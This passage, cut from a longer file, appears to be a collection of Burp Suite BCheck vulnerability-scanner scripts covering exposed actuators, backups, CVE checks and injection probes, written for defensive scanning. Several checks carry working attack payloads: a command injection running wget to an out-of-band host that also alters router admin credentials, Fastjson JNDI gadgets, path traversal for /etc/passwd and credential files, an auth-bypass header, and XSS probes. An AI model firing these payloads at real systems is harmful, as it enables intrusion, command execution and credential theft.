    end if

--------------------------------------------------------------------------------
/other/symfony-verbose-debug-mode.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check: requests a non-existent path and the dev front
# controller, looking for Symfony debug/profiler output in the error page.
metadata:
    language: v1-beta
    name: "Misconfigured Symfony Verbose Plugin"
    description: "Misconfigured Symfony Verbose plugin vulnerable to sensitive data exposure."
    author: "Yasin Yilmaz"
    tags: "symfony", "php"

run for each:
    potential_path =
        "/raxacoricofallapatorians",
        "/frontend_dev.php/$"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # NOTE(review): the 404 status test is joined with "and" only to the
    # first body marker; the remaining markers are "or"-ed in without
    # parentheses, so (under the usual precedence) any status code passes
    # for them. Parenthesising the whole marker list, e.g.
    #   if {check.response.status_code} is "404" and ("Profiler" in ... or ... or "Debug toolbar" in ...) then
    # applies the status check uniformly.
    if {check.response.status_code} is "404"
    and "Profiler" in {check.response.body} or "sfError404Exception" in {check.response.body} or "SF_ROOT_DIR" in {check.response.body} or "sf_globals" in {check.response.body} or "sfWebDebug" in {check.response.body} or "Debug toolbar" in {check.response.body} then
        report issue:
            severity: high
            confidence: tentative
            detail: `Misconfigured Symfony Verbose plugin vulnerable to sensitive data exposure.`
            remediation: "Disable Symfony Verbosity."
    end if

--------------------------------------------------------------------------------
/other/JavaScript/jsMapFile.bcheck:
--------------------------------------------------------------------------------
# Passive check: flags JavaScript responses that carry a sourceMappingURL
# reference.
metadata:
    language: v1-beta
    name: "Javascript Source map detected"
    description: "This rule checks for the presence of indicators suggesting the availability of a JavaScript map file."
    author: "TheButcher"
    tags: "passive","javascript","informative"

given response then
    if {latest.response.headers} matches "application/javascript" or {latest.response.headers} matches "text/javascript" then
        # Only the reference is detected; whether the .map file itself is
        # actually served is not verified here (hence info/firm).
        if {latest.response.body} matches "sourceMappingURL=" then
            report issue:
                severity: info
                confidence: firm
                detail: "Client-side JavaScript source code can be combined, minified, or compiled. A source map is a file that maps from the transformed source code back to the original source code. However, exposing a source map in a production environment may potentially aid attackers in reading and debugging JavaScript code."
                remediation: "According to the best practices, source maps should not be accessible in a Production Environment."
        end if
    end if

--------------------------------------------------------------------------------
/vulnerabilities-CVEd/CVE-2023-37265 - CasaOS - Auth Bypass due to a lack of IP address verification.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check for CVE-2023-37265: requests a folder listing with
# a loopback X-Forwarded-For header and looks for a successful JSON listing.
metadata:
    language: v1-beta
    name: "CVE-2023-37265 - CasaOS - Auth Bypass due to a lack of IP address verification"
    description: "Checks for CVE-2023-37265"
    author: "Dolph Flynn"
    tags: "CVE-2023-37265", "CasaOS", "auth-bypass", "RCE"


define:
    potential_path = "/v1/folder?path=%2F"


given host then
    send request called check:
        method: "GET"
        path: {potential_path}
        headers:
            "X-Forwarded-For": "127.0.0.1"


    # Four body markers are required; no status-code or content-type test,
    # which the body markers largely compensate for.
    if {check.response.body} matches "\"success\":200\b" and {check.response.body} matches "\"message\":\"ok\"" and
    {check.response.body} matches "\bcontent\b" and {check.response.body} matches "\bis_dir\b" then

        report issue:
            severity: high
            confidence: tentative
            detail: "CasaOS < 0.4.4 - Auth Bypass via Internal IP."
            remediation: "Apply patch within CasaOS 0.4.4."
    end if

--------------------------------------------------------------------------------
/other/Etcd Server - Unauthenticated Access.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check for an etcd v2 keys API that lists keys without
# credentials.
metadata:
    language: v1-beta
    name: "Etcd Server - Unauthenticated Access"
    author: "Parimal Shaw"
    description: "A Kubernetes etcd server stores the cluster secrets and configurations files. Anonymous access on etcd allows unauthenticated access the data without providing any authentication credentials."
    tags: "Kubernetes Misconfiguration"

define:
    # Only the v2 HTTP API is probed; an etcd exposing only the v3 API would
    # presumably not be detected by this check — confirm if v3 coverage is wanted.
    potential_path = "/v2/keys/"


given host then
    send request called check:
        method: "GET"
        path: {potential_path}


    if {check.response.status_code} is "200"
    and "\"node\":" in {check.response.body}
    and "\"key\":" in {check.response.body}
    and "application/json" in {check.response.headers} then
        report issue:
            severity: high
            confidence: certain
            detail: "A Kubernetes etcd server cluster secrets and configurations files are accessible."
            remediation: "Implement the following remediation https://etcd.io/docs/v2.3/authentication/"
    end if

--------------------------------------------------------------------------------
/other/WebBackup Exposed.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check for common web-root backup archive names, including
# ones derived from the host name.
metadata:
    language: v1-beta
    name: "WebBackup Exposed"
    description: "The website has detected a backup file leak."
    author: "JaveleyQAQ"
    tags: "Leak", "Exposed"

run for each:
    # Backtick entries interpolate the host name; quoted entries are literal.
    url_array =
        `/{base.request.url.host}.bak`,
        `/{base.request.url.host}.rar`,
        `/{base.request.url.host}.zip`,
        "/web.rar",
        "/web.zip",
        "/wwwroot.rar",
        "/wwwroot.zip",
        "/data.bak",
        "/db.rar",
        "/db.zip",
        "/db.bak",
        "/backup.zip"


given host then
    send request called check:
        method: "GET"
        path: {url_array}

    # A 200 with an archive or octet-stream content type is reported;
    # application/octet-stream is generic, hence confidence: tentative.
    # NOTE(review): remediation is the literal "none" — the reader gets no
    # guidance. Something like "Remove backup archives from the web root and
    # store them outside the document root" would be more useful.
    if {check.response.status_code} is "200" and ("application/zip" in {check.response.headers} or "application/x-rar-compressed" in {check.response.headers} or "application/octet-stream" in {check.response.headers}) then
        report issue:
            severity: high
            confidence: tentative
            detail: "The website has detected a backup file leak. Please perform a manual inspection."
            remediation: "none"
    end if

--------------------------------------------------------------------------------
/other/springboot/Springboot metrics actuator.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check for an exposed Spring Boot metrics endpoint.
metadata:
    language: v1-beta
    name: "Springboot metrics actuator"
    description: "Springboot metrics actuator may expose sensitive information"
    author: "Mateusz Dabrowski (dbrwsky)"
    tags: "actuator", "springboot", "exposure", "informative"

run for each:
    potential_path =
        "/actuator/metrics",
        "/actuator/prometheus"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # "mem" is implied by "mem.free", so that test is redundant but harmless.
    # NOTE(review): the markers (mem.free, instance.uptime) and the text/plain
    # content type look like the Spring Boot 1.x metrics format; the
    # /actuator/prometheus body presumably uses different metric names, so
    # that path may never match — confirm against a real response.
    if {check.response.status_code} is "200"
    and "mem" in {check.response.body}
    and "mem.free" in {check.response.body}
    and "processors" in {check.response.body}
    and "instance.uptime" in {check.response.body}
    and "text/plain" in {check.response.headers} then
        report issue:
            severity: low
            confidence: certain
            detail: `Springboot metrics actuator found at {potential_path}.`
            remediation: "Ensure metrics is not exposed or doesn't contain sensitive information."
    end if

--------------------------------------------------------------------------------
/vulnerabilities-CVEd/CVE-2019-17662 - ThinVNC 10b1 - Auth Bypass.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check for CVE-2019-17662: a raw request with a traversal
# sequence for ThinVnc.ini, reported when the body contains credential keys.
metadata:
    language: v2-beta
    name: "CVE-2019-17662 - ThinVNC 1.0b1 - Auth Bypass"
    description: "Checks for CVE-2019-17662"
    author: "Dolph Flynn"
    tags: "CVE-2019-17662", "thinvnc", "auth-bypass"


given host then
    # Raw request literal; header lines are kept at column 0 because
    # whitespace inside the backticks is part of the request.
    send request called check:
        `GET /{random_str(17)}/../../ThinVnc.ini HTTP/1.1
Host: {base.request.url.host}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: {user_agent}
Connection: close
Cache-Control: max-age=0

`

    if {check.response.status_code} is "200"
    and {check.response.headers} matches "application/binary"
    and {check.response.body} matches "\bUser=\b"
    and {check.response.body} matches "\bPassword=\b" then

        report issue:
            severity: high
            confidence: tentative
            detail: "ThinVNC 1.0b1 - Authentication Bypass."
    end if

--------------------------------------------------------------------------------
/other/Kubernetes_Pods_API_Discovery_&_Remote_Code_Execution.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check for an unauthenticated Kubernetes pods listing.
metadata:
    language: v1-beta
    name: "Kubernetes Pods - API Discovery & Remote Code Execution"
    author: "Parimal Shaw"
    description: "A Kubernetes Pods API was discovered. When the service port is available, unauthenticated users can execute commands inside the container."
    tags: "Kubernetes Misconfiguration"


run for each:
    # /pods is the kubelet-style path, /api/v1/pods the API-server path.
    potential_path =
        "/pods",
        "/api/v1/pods"


given host then
    send request called check:
        method: "GET"
        path: {potential_path}


    # "apiVersion" in a JSON 200 is a weak marker on its own; any Kubernetes
    # style object would satisfy it, so the detail's RCE claim is an
    # inference rather than something this check verifies.
    if {check.response.status_code} is "200"
    and "apiVersion" in {check.response.body}
    and "application/json" in {check.response.headers} then
        report issue:
            severity: high
            confidence: certain
            detail: "A Kubernetes Pods API was discovered. When the service port is available, unauthenticated users can execute commands inside the container."
            remediation: "Ensure to Disable access to following instances in Kubernetes."
    end if

--------------------------------------------------------------------------------
/vulnerabilities-CVEd/CVE-2023-29298 Adobe ColdFusion Access Control Bypass.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check for CVE-2023-29298: requests the administrator page
# through a double-slash prefix.
metadata:
    language: v1-beta
    name: "CVE-2023-29298 Adobe ColdFusion Access Control Bypass"
    description: "Checks for CVE-2023-29298"
    author: "Ollie Whitehouse"
    # NOTE(review): other checks in this repository give tags as separate
    # quoted values; here three tags are packed into one string.
    tags: "CVE-2023-29298 CVE ColdFusion"

# Details of the vulnerability can be found in https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/
define:
    potential_path =
        "//CFIDE/administrator/index.cfm"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # Checks that we get a 200 AND that the output we expect in the result
    # NOTE(review): a host whose administrator page is simply reachable (no
    # access control at all) also passes this test, so "certain" overstates
    # it. Comparing against a request to the single-slash path would tell a
    # bypass apart from plain exposure.
    if {check.response.status_code} is "200" and "ColdFusion" in {check.response.body} then
        report issue:
            severity: high
            confidence: certain
            detail: "Host is vulnerable to the access control bypass vulnerability CVE-2023-29298"
            remediation: "See Adobe's APSB23-40 Security Bulletin - CF2018 Update 17, CF2021 Update 7, and CF2023 GA build for patched version"
    end if

--------------------------------------------------------------------------------
/vulnerability-classes/injection/Spring4Shell.bcheck:
--------------------------------------------------------------------------------
# Active, request-level check: appends a class-loader property query parameter
# to each request and reports a 400 carrying IllegalArgumentException.
metadata:
    language: v1-beta
    name: "Spring4Shell (Response)"
    description: "Checks for the Spring4Shell vulnerability"
    author: "Giriraj R (cipherlover)"
    # NOTE(review): "Srping4Shell" is misspelt (runtime string, left as is).
    tags: "Srping4Shell", "CVE-2022-22965", "cve"

define:
    spring4shell_payload = `class.module.classLoader.URLs%5B0%5D=0`
    issueDetail = `The server has returned a response status code as "400" and along with "java.lang.IllegalArgumentException" error on the response body denoting that there is possibility for Spring4shell vulnerability`
    issueRemediation = "Make sure you are up to date with patches and follow the remediation steps for CVE-2022-22965."

given request then
    # NOTE(review): the space before the colon in "called check :" differs
    # from every other check on this page; confirm the parser accepts it.
    send request called check :
        appending queries: `{spring4shell_payload}`

    # A 400 with that exception text is a plausible but indirect signal;
    # "firm" may be generous given how generic IllegalArgumentException is.
    if {check.response.status_code} is "400" and "java.lang.IllegalArgumentException" in {check.response.body} then
        report issue:
            severity: high
            confidence: firm
            detail: `{issueDetail}`
            remediation: `{issueRemediation}`
    end if


--------------------------------------------------------------------------------
/other/GraphQL/grapple-get-method.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check: issues a trivial GraphQL query over GET and reports
# when the endpoint answers it.
metadata:
    language: v2-beta
    name: "GraphQL CSRF GET / Method Enabled"
    description: "Cross Site Request Forgery happens when an external website gains ability to make API calls impersonating an user if he visits the website while being authenticated to your API.
    Allowing API calls through GET requests can lead to CSRF attacks, because cookies are added automatically to GET requests by the browser."
    author: "Dolev Farhi"

run for each:
    # Double-quoted, so the braces are sent literally rather than interpolated.
    potential_path =
        "/graphql?query={__typename}",
        "/api/graphql?query={__typename}"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # Requires "query" as well as "data"/"__typename" in a JSON body; whether
    # "in" is case-sensitive (and thus whether "Query" satisfies it) is not
    # visible here — confirm if hits seem to be missing.
    if "query" in {check.response.body} and "data" in {check.response.body} and "__typename" in {check.response.body} and "application/json" in {check.response.headers} then
        report issue:
            severity: info
            confidence: certain
            detail: `GraphQL CSRF GET Method enabled on {potential_path}.`
            remediation: "Disable GET Method"
    end if

--------------------------------------------------------------------------------
/other/files/Interesting-file-error-in-the-response.bcheck:
--------------------------------------------------------------------------------
# Passive check: flags responses containing OS/file-system error strings.
metadata:
    language: v2-beta
    name: "Interesting file error in the response"
    description: "Interesting file error in the response"
    author: "Andrej Šimko @ Accenture"
    tags: "file", "error", "passive"

#note that in time, when BChecks will support tuples I will rewrite this rule to be prettier
given response then
    # Single alternation of literal messages; no content-type gate, so
    # documentation pages quoting these messages will also be flagged
    # (info/tentative is appropriate for that).
    if {latest.response.body} matches "(The system cannot find the path specified|No such file or directory|Cannot read file|Path not found|Disk full|Illegal file name|Unable to create directory|Directory not empty|Input/output error|Cannot find the device specified|Is a directory|Resource temporarily unavailable|File exists|Read-only file system|Filename too long|Too many open files|Failed to mount filesystem|Extension point not found|Unsupported extension)" then
        report issue:
            severity: info
            confidence: tentative
            detail: "Investigate the response if you have not stumbled upon a file operation which could be used to obtain RCE, or used to rewrite some files on the server."
    end if

--------------------------------------------------------------------------------
/vulnerabilities-CVEd/CVE-2020-35713 - Belkin Linksys RE6500 10012001 - RCE.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check for CVE-2020-35713 using an out-of-band
# (Collaborator) callback.
metadata:
    language: v2-beta
    name: "CVE-2020-35713 - Belkin Linksys RE6500 <1.0.012.001 - RCE"
    description: "Checks for CVE-2020-35713"
    author: "Dolph Flynn"
    tags: "CVE-2020-35713", "RCE", "belkin", "linksys", "OAST"


given host then
    # NOTE(review): this request posts to the admin-settings form, so on a
    # vulnerable device it changes the admin credentials as a side effect.
    # That is worth stating in the description so operators can decide
    # whether to run it against production equipment.
    # Raw request literal; header lines stay at column 0. Origin is set to the
    # full base URL (including any path), which is unusual for an Origin header
    # — confirm the device does not reject it.
    send request called check:
        `POST /goform/setSysAdm HTTP/1.1
Host: {base.request.url.host}
User-Agent: {user_agent}
Connection: close
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
Origin: {base.request.url}
Referer: {base.request.url}/login.shtml

admuser=admin&admpass=;wget http://{generate_collaborator_address()};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1`

    if http interactions then

        report issue:
            severity: high
            confidence: tentative
            detail: "Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution."
    end if


--------------------------------------------------------------------------------
/other/Cache Deception check (Path confusion).bcheck:
--------------------------------------------------------------------------------
# Active, request-level check: appends random static-looking suffixes to a
# 200 page's path and reports when the body is returned unchanged.
metadata:
    language: v1-beta
    name: "Cache Deception check (Path confusion)"
    description: "Check for misconfiguration while routing .css, .js, .png files"
    author: "Sergey Kolesnikov (tr3harder) "

run for each:
    # Six variants per base request: a new path segment ("/x.css") and a
    # bare suffix glued onto the last segment ("x.css").
    potential_path =
        `/{random_str(17)}.css`,
        `/{random_str(17)}.js`,
        `/{random_str(17)}.png`,
        `{random_str(17)}.css`,
        `{random_str(17)}.js`,
        `{random_str(17)}.png`

given request then
    # Only pages that already return 200 are worth probing.
    if {base.response.status_code} is "200" then
        send request called check:
            appending path: {potential_path}


        # Identical bodies mean the suffix was ignored by routing, the
        # precondition for cache deception; whether a cache actually sits in
        # front is not tested here.
        if {check.response.status_code} is "200"
        and {base.response.body} is {check.response.body} then
            report issue:
                severity: medium
                confidence: certain
                detail: `Cache deception misconfiguration was probably found while routing .css, .js, .png files.
                More detailed: https://book.hacktricks.xyz/pentesting-web/cache-deception#cache-deception`
                remediation: "Correctly configure rules to route certain filetypes"
        end if
    end if

--------------------------------------------------------------------------------
/examples/exposed-backup-file.bcheck:
--------------------------------------------------------------------------------
# Path-level example: requests the path with a backup extension, then with a
# random extension, and reports only when the two responses differ.
metadata:
    language: v2-beta
    name: "Path-level"
    description: "Tests for exposed backup files"
    author: "Carlos Montoya"

run for each:
    # you could add more values to this list to make the check repeat
    extension = ".bak", ".back", ".backup", ".old"

given path then
    if not({base.response.status_code} is "404") then
        send request called check:
            # "(.)/?$" drops a trailing slash before appending the extension.
            replacing path: {regex_replace({base.response.url.path}, "(.)/?$", `$1{extension}`)}

        if {check.response.status_code} is {base.response.status_code} then
            # Control request with a random extension, to rule out catch-all
            # routes that answer every path the same way.
            send request called garbage:
                replacing path: {regex_replace({base.response.url.path}, "(.)/?$", `$1.{random_str(10)}`)}

            if {garbage} differs from {check} then
                report issue and continue:
                    severity: info
                    confidence: firm
                    detail: `Backup file found at {check.request.url}`
                    remediation: "Ensure your backup files are not exposed."
            end if
        end if
    end if

--------------------------------------------------------------------------------
/other/corsCredentialedRequestsMisconfiguration.bcheck:
--------------------------------------------------------------------------------
# Passive check: wildcard Access-Control-Allow-Origin combined with
# Access-Control-Allow-Credentials: true.
metadata:
    language: v2-beta
    name: "Invalid CORS configuration for credentialed requests detected"
    description: "Checks for a broken CORS configuration case: Credentialed requests and wildcards."
    author: "Dominique Righetto"
    tags: "passive", "informative"

# The server must not specify the "*" wildcard for the Access-Control-Allow-Origin response-header value, but must instead specify an explicit origin
# Source: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#requests_with_credentials
given response then
    # NOTE(review): "\s+" requires at least one whitespace after the colon, so
    # a header written without a space ("Access-Control-Allow-Origin:*",
    # still valid HTTP) is missed; "\s*" covers both forms. Also note that
    # other checks on this page double the backslash ("\\s") inside
    # double-quoted patterns — confirm which form the v2-beta parser expects.
    if {latest.response.headers} matches "(?i)Access-Control-Allow-Origin:\s+\*" and
    {latest.response.headers} matches "(?i)Access-Control-Allow-Credentials:\s+true" then
        report issue:
            severity: info
            confidence: firm
            detail: "Credentialed CORS requests cannot used wildcards origins."
            remediation: "Specify an explicit allow origin. Refer to the Mozilla CORS documentation for technical details: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#requests_with_credentials"
    end if

--------------------------------------------------------------------------------
/other/fastjson/Fastjson-1.2.68-Deserialization-RCE.bcheck:
--------------------------------------------------------------------------------
# Active, request-level check: for JSON requests, tries three autoType
# gadget payloads pointing at a Collaborator address and reports on DNS
# interaction.
metadata:
    language: v1-beta
    name: "Fastjson 1.2.68 Deserialization RCE"
    description: "https://paper.seebug.org/1192/"
    author: "Javeley"
    tags: "Fastjson", "Deserialization","RCE","Alibaba"

run for each:
    # One request per payload; "\{" keeps the brace literal.
    payload =
        `\{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}"}`,
        `\{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"rmi://{generate_collaborator_address()}/{random_str(4)}"}`,
        `\{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"rmi://{generate_collaborator_address()}/{random_str(4)}"}`

given request then
    # Same JSON gate as the 1.2.42 check.
    if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then
        send request:
            body: {payload}

        # NOTE(review): as in the 1.2.42 check, detail/remediation are bare
        # URLs; descriptive text would help whoever triages the issue.
        if dns interactions then
            report issue:
                severity: high
                confidence: certain
                detail: "https://paper.seebug.org/1192/."
                remediation: "https://paper.seebug.org/1192/."
        end if
    end if

--------------------------------------------------------------------------------
/vulnerabilities-CVEd/CVE-2023-39141 Aria2 WebUI - Path Traversal.bcheck:
--------------------------------------------------------------------------------
# Active, host-level, two-step check: fingerprints Aria2 WebUI on "/" first,
# then tries a traversal path for /etc/passwd.
metadata:
    language: v1-beta
    name: "CVE-2023-39141 Aria2 WebUI - Path Traversal"
    description: "Check for CVE-2023-39141"
    author: "Joao Paulo Assis (j0hnZ3RA)"
    tags: "CVE-2023-39141","lfi","unauth","aria2","webui"

define:
    base_path = "/"
    potential_path = "/../../../../../../../../../../../../../../../../../../../../etc/passwd"

given host then
    send request called check1:
        method: "GET"
        path: {base_path}

    # Second request only runs once the product banner has been seen.
    if "Aria2 WebUI" in {check1.response.body} then
        send request called check2:
            method: "GET"
            path: {potential_path}

        # NOTE(review): "root" alone is a weak marker (it appears in plenty of
        # HTML/JS); matching the passwd record shape, e.g. "root:x:0:0",
        # would make "certain" defensible.
        if {check2.response.status_code} is "200" and "root" in {check2.response.body} then
            report issue:
                severity: high
                confidence: certain
                detail: "webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability."
                remediation: "Upgrade to the latest version of Aria2 WebUI to fix the path traversal vulnerability."
        end if

    end if

--------------------------------------------------------------------------------
/vulnerabilities-CVEd/CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check for reflected XSS in print.php (CVE-2023-36346).
metadata:
    language: v1-beta
    name: "CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting"
    author: "Parimal Shaw"
    description: "Checks for CVE-2023-36346"
    tags: "CVE-2023-36346"

define:
    # NOTE(review): as rendered here the parameter value is empty, and the
    # body marker below is the empty string. Both look like an HTML-tag probe
    # lost in extraction — confirm against the source file. As written,
    # "" in {body} is trivially true, so the check degrades to
    # 200 + "print" + text/html and would misfire on any print page.
    potential_path = "/print.php?nm_member="

given host then
    send request called check:
        method: "GET"
        path: {potential_path}


    if {check.response.status_code} is "200" and "" in {check.response.body} and "print" in {check.response.body} and "text/html" in {check.response.headers} then
        report issue:
            severity: medium
            confidence: certain
            detail: "POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php."
            remediation: "Upgrade to Latest Version or validate all the input data, make sure that only the allowlisted data is allowed, and ensure that all variable output in a page is encoded before it is returned to the user."
    end if

--------------------------------------------------------------------------------
/vulnerabilities-CVEd/CVE_2021_21816_D_Link_DIR_3040_1_13B03_Information_Disclosure.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check for CVE-2021-21816: an unauthenticated syslog page.
metadata:
    language: v1-beta
    name: "CVE-2021-21816 D-Link DIR-3040 1.13B03 - Information Disclosure"
    author: "Parimal Shaw"
    description: "Check For CVE-2021-21816"
    tags: "CVE-2021-21816"

define:
    potential_path = "/messages"


given host then
    send request called check:
        method: "GET"
        path: {potential_path}


    # Three body markers, the last of which ("/etc_ro/lighttpd/www") is
    # device-specific and carries most of the signal.
    if {check.response.status_code} is "200"
    and "syslog:" in {check.response.body}
    and "admin" in {check.response.body}
    and "/etc_ro/lighttpd/www" in {check.response.body} then
        report issue:
            severity: medium
            confidence: certain
            detail: "D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations."
            remediation: "Proper Access Control should be implemented."
    end if

--------------------------------------------------------------------------------
/other/springboot/Springboot caches actuator.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check for an exposed Spring Boot caches actuator.
metadata:
    language: v1-beta
    name: "Springboot caches actuator"
    description: "Springboot caches actuator exposed"
    author: "Mateusz Dabrowski (dbrwsky)"
    tags: "actuator", "springboot", "exposure", "informative"

run for each:
    potential_path =
        "/caches",
        "/actuator/caches"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # Accepts plain JSON or any of the actuator vendor media types.
    # NOTE(review): detail/remediation say "info caches", which reads like a
    # copy-and-paste from an info-actuator check; "caches actuator" is meant.
    if {check.response.status_code} is "200"
    and "\"cacheManagers\"" in {check.response.body}
    and ("application/json" in {check.response.headers}
    or "application/vnd.spring-boot.actuator" in {check.response.headers}
    or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers}
    or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers}
    or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then
        report issue:
            severity: low
            confidence: certain
            detail: `Springboot info caches found at {potential_path}.`
            remediation: "Ensure info caches is not exposed."
    end if

--------------------------------------------------------------------------------
/vulnerabilities-CVEd/CVE_2021_20114_TCExam_Gt_14_8_1_Sensitive_Information_Exposure.bcheck:
--------------------------------------------------------------------------------
metadata:
    language: v1-beta
    name: "CVE-2021-20114 TCExam <= 14.8.1 - Sensitive Information Exposure"
    author: "Parimal Shaw"
    description: "Check for CVE-2021-20114"
    tags: "CVE-2021-20114"

define:
    potential_path = "/cache/backup/"


given host then
    send request called check:
        method: "GET"
        path: {potential_path}


    if {check.response.status_code} is "200" and "Index of /cache/backup" in {check.response.body} and "Parent Directory" in {check.response.body} and ".sql.gz" in {check.response.body} then
        report issue:
            severity: high
            confidence: certain
            detail: "When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files. Among other things, these backup files contain usernames, password hashes and other user information that was supplied on signup."
            remediation: "It is Recommended to Upgrade to latest version or disable directory listing."
24 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-46805-Ivanti Auth Bypass.bcheck: -------------------------------------------------------------------------------- 1 | # https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/ 2 | # https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis 3 | 4 | metadata: 5 | language: v2-beta 6 | name: "CVE-2023-46805 - Ivanti Connect Secure and Ivanti Policy Secure Authentication Bypass" 7 | description: "Checks for CVE-2023-46805" 8 | author: "trikster" 9 | tags: "CVE-2023-46805", "cve", "auth-bypass", "ivanti" 10 | 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: "/api/v1/totp/user-backup-code/../../system/system-information" 16 | 17 | if {check.response.status_code} is "200" and 18 | "Content-Type: application/json" in {check.response.headers} and 19 | {check.response.body} matches "(?m)\s*\{\s*\"software-inventory\"\s*:\s*\{\s*\"software\"\s*:\s*\{\s*\"name\"\s*:\s*\"\w+\"" then 20 | 21 | report issue: 22 | severity: high 23 | confidence: firm 24 | detail: "Application appears to be vulnerable to CVE-2023-46805." 25 | remediation: "Apply vendor patches." 26 | 27 | end if 28 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2018-20824 - Atlassian Jira WallboardServlet Cross Site Scripting.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting" 4 | description: "The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter." 
5 | author: "mrrootsec" 6 | tags: "xss", "cve", "jira" 7 | 8 | run for each: 9 | potential_path = "/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)" 10 | 11 | given request then 12 | send request called jxss: 13 | path: {potential_path} 14 | method: "GET" 15 | 16 | if {jxss.response.status_code} is "200" and "timeout: alert(document.domain)" in {jxss.response.body} then 17 | report issue: 18 | severity: medium 19 | confidence: certain 20 | detail: "Vulnerable to CVE-2018-20824 - The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter." 21 | remediation: "Upgrade Jira to the latest version" 22 | end if 23 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE_2022_0150_WordPress_Accessibility_Helper_Lt_0_6_0_7_Cross_Site.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2022-0150 WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting" 4 | author: "Parimal Shaw" 5 | description: "Check for CVE-2022-0150." 6 | tags: "CVE-2022-0150" 7 | 8 | define: 9 | potential_path = "/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v" 10 | 11 | given host then 12 | send request called check: 13 | method: "GET" 14 | path: {potential_path} 15 | 16 | if {check.response.status_code} is "200" and "var wah_target_src = '';alert(document.domain);//';" in {check.response.body} and "text/html" in {check.response.headers} then 17 | report issue: 18 | severity: medium 19 | confidence: certain 20 | detail: "WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page." 
21 | remediation: "Upgrade to Latest Version or validate all the input data, make sure that only the allowlisted data is allowed, and ensure that all variable output in a page is encoded before it is returned to the user." 22 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot info actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot info actuator" 4 | description: "Springboot info actuator exposed" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/info", 11 | "/actuator/info" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "\"name\"" in {check.response.body} 20 | and "\"version\"" in {check.response.body} 21 | and ("application/json" in {check.response.headers} 22 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 26 | report issue: 27 | severity: low 28 | confidence: certain 29 | detail: `Springboot info actuator found at {potential_path}.` 30 | remediation: "Ensure info actuator is not exposed." 
